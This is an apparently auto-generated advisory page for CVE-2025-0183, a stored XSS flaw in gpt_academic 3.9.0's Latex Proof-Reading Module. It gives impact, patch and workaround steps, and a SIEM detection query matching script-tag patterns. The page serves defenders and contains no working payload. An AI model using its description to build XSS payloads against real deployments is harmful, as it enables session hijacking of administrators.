CVE-2025-0183
📋 TL;DR
A stored XSS vulnerability in binary-husky/gpt_academic's Latex Proof-Reading Module allows attackers to inject malicious scripts into debug_log.html files. When administrators view these debug reports, the scripts execute, potentially enabling unauthorized actions. This affects version 3.9.0 users who have the module enabled.
💻 Affected Systems
- binary-husky/gpt_academic
📦 What is this software?
Gpt Academic by Binary Husky
⚠️ Risk & Real-World Impact
Worst Case
Admin session hijacking leading to complete system compromise, data theft, or ransomware deployment through admin privileges.
Likely Case
Session theft allowing attacker to perform unauthorized actions as admin, potentially accessing sensitive data or modifying configurations.
If Mitigated
Limited impact if proper input validation and output encoding are implemented, restricting script execution.
🎯 Exploit Status
Exploit requires ability to inject payload into debug_log.html, then admin must view the file. Public details available in huntr.com reference.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Version after 3.9.0 (check latest release)
Vendor Advisory: https://huntr.com/bounties/53bced90-64a9-4ca2-8f2f-282c4ce84d1f
Restart Required: No
Instructions:
1. Update to latest version of gpt_academic. 2. Verify Latex Proof-Reading Module has proper input sanitization. 3. Remove any existing debug_log.html files.
🔧 Temporary Workarounds
Disable debug logging
allPrevent generation of debug_log.html files by disabling debug functionality in Latex Proof-Reading Module.
Modify configuration to disable debug logging in the module settings
Restrict access to debug files
linuxBlock web access to debug_log.html files via web server configuration.
Add deny rule for debug_log.html in nginx/apache config
🧯 If You Can't Patch
- Implement strict Content Security Policy (CSP) headers to prevent script execution from untrusted sources.
- Regularly audit and sanitize debug_log.html files, removing any suspicious content.
🔍 How to Verify
Check if Vulnerable:
Check if version is 3.9.0 and Latex Proof-Reading Module generates debug_log.html files without proper input sanitization.
Check Version:
Check package version in project configuration or run: python -c "import gpt_academic; print(gpt_academic.__version__)"
Verify Fix Applied:
Test if script tags in Latex input are properly encoded in generated debug_log.html output.
📡 Detection & Monitoring
Log Indicators:
- Unusual script tags or JavaScript in debug_log.html files
- Admin accessing debug reports with suspicious parameters
Network Indicators:
- HTTP requests to debug_log.html with encoded payloads
SIEM Query:
source="web_logs" AND uri="*debug_log.html*" AND (content="<script>" OR content="javascript:")